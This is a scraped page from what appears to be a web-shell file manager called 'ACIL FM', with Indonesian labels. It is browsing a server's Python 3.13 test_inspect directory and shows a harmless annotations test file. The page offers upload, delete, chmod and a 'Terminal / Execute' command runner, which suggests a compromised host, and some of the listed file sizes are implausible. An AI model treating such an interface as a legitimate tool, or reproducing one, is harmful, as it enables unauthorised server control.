ACIL FM
Dark
Refresh
Current DIR:
/opt/alt/python313/lib64/python3.13/test/test_inspect
/
opt
alt
python313
lib64
python3.13
test
test_inspect
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
__pycache__
-
chmod
Open
Rename
Delete
inspect_fodder.py
2.07 MB
chmod
View
DL
Edit
Rename
Delete
inspect_fodder2.py
5.28 MB
chmod
View
DL
Edit
Rename
Delete
inspect_stock_annotations.py
509 B
chmod
View
DL
Edit
Rename
Delete
inspect_stringized_annotations.py
612 B
chmod
View
DL
Edit
Rename
Delete
inspect_stringized_annotations_2.py
60 B
chmod
View
DL
Edit
Rename
Delete
inspect_stringized_annotations_pep695.py
1.62 MB
chmod
View
DL
Edit
Rename
Delete
test_inspect.py
244.33 MB
chmod
View
DL
Edit
Rename
Delete
__init__.py
132 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/alt/python313/lib64/python3.13/test/test_inspect/inspect_stock_annotations.py
a:int=3 b:str="foo" class MyClass: a:int=4 b:str="bar" def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return isinstance(other, MyClass) and self.a == other.a and self.b == other.b def function(a:int, b:str) -> MyClass: return MyClass(a, b) def function2(a:int, b:"str", c:MyClass) -> MyClass: pass def function3(a:"int", b:"str", c:"MyClass"): pass class UnannotatedClass: pass def unannotated_function(a, b, c): pass
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply